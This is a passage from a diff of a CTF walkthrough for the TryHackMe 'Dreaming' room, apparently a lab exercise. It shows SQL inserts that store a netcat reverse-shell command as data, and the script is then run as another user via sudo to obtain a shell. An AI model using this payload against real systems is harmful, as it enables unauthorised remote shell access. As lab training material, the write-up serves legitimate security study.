Qusti/CTF_stuff/THM/Walkthrough_Dreaming.md

 `Insert into dreams (dreamer,dream) values ("test1","test2");` we can test that we can input into the columns.
 Use `select * from dreams;` again to check that the data was successfully inserted into the table.
 `insert into dreams (dreamer,dream) values ("pwned","rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <your_ip> <listening_port> >/tmp/f");` to insert our reverse shell to the table.

 Again starting an ncat listener for the port specified in the reverse shell.
-Then I can execute the python script as `death`.
+Then I can execute the Python script as `death`.
 ```
 sudo -u death /usr/bin/python3 /home/death/getDreams.py
 Alice + Flying in the sky